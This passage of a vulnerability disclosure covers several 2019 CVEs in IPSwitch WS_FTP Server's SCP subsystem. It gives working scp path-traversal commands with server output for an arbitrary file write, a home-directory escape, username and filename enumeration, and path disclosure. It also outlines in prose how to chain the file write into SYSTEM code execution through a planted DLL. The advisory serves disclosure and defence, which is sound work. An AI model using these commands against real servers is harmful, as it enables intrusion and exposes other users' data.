Exploitation:
$ echo test > \\..\\..\\..\\..\\..\\..\\..\\..\\test.txt
$ scp \\..\\..\\..\\..\\..\\..\\..\\..\\test.txt user1@192.168.194.138: user1@192.168.194.138's password:
\..\..\..\..\..\..\..\..\test.txt 100% 5 0.5KB/s 00:00
The file is present on the server:
C:\>dir /q test.txt
Volume in drive C has no label.
Volume Serial Number is F603-DB19
Directory of C:\
04/03/2019 02:00 PM 5 BUILTIN\Administrators test.txt
1 File(s) 5 Bytes
0 Dir(s) 49,050,906,624 bytes free
C:\>type test.txt
test
Note that the file is owned by an administrative user, demonstrating that this vulnerability allows files to be written anywhere on the filesystem.
This vulnerability can be further leveraged to obtain remote code execution as the SYSTEM user without requiring a reboot. By uploading a malicious DLL file, which is loaded by an IIS worker process used for the WS_FTP administrative interface approximately once every hour, we can obtain NETWORK SERVICE privilege. This level of privilege is sufficient to then add a new WS_FTP system administrator user which can create an FTP SITE command that is run as SYSTEM, resulting in code execution as the SYSTEM user. A fully working proof-of-concept has been developed and will be published at a later date.
CVE-2019-12146: Home Directory Escape via Path Traversal
Overview:
IPSwitch WS_FTP Server v8.6.0 contains a second path traversal vulnerability in the SCP Subsystem allowing authenticated attackers to write files and create directories outside of their home directory into the host’s FTP root. The issue stems from the application improperly resolving destination directories containing 3 or more dot (“.”) characters. This vulnerability exists in the parsing of the destination folder name and is distinct from CVE-2019-12144 above.
Exploitation:
The following commands create a test file and directory, and copies them to the vulnerable server:
$ touch test.txt
$ mkdir test
$ scp -r test.txt test/ user@host.com:.../
A directory listing on the server shows that the file and directory have been placed in the users/ directory, outside of the user’s home directory:
dir /q users/
...SNIP...
<DIR> 0 BUILTIN\Administrators test
0 BUILTIN\ADMINISTRATORS test.txt
CVE-2019-12143: Username and Filename Disclosure via SCP Recursive Download
Authenticated users are able to discover usernames and filenames of other users using SCP recursive downloads along with path traversal and wildcard characters. In the event a user does not have access to a file, a permission denied error followed by the file path is returned in the response.
Exploitation:
In this example, the system contains 3 users – user1, user2, and adminuser. user1 is able to trigger error messages containing the other usernames along with filenames contained in their home directories.
$ scp -r user1@192.168.174.152:../../*/*/* .
user1@192.168.174.152's password:
scp:Permission Denied! /users/adminuser/admintestfile.txt
user1testfile.txt 100% 912 1.6MB/s
scp:Permission Denied! /users/user2/user2testfile.txt
CVE-2019-12145: Path Disclosure via Nonexistent Filenames
Overview:
By using filenames containing backslash characters in a manner similar to CVE-2019-12146, it is possible to cause the WS_FTP Server to return an error message that discloses the full pathname of the FTP root directory. This information may be useful to an attacker attempting to learn more about the filesystem layout to conduct further attacks.
Exploitation:
$ touch \\doesnt\\exist
$ scp \\doesnt\\exist user1@192.168.194.138:
user1@192.168.194.138's password:
scp:Could not find a part of the path 'C:\Program Files (x86)\Ipswitch\WS_FTP Server\WS_FTP Server\[hostname redacted]\users\user1\doesnt\exist'.
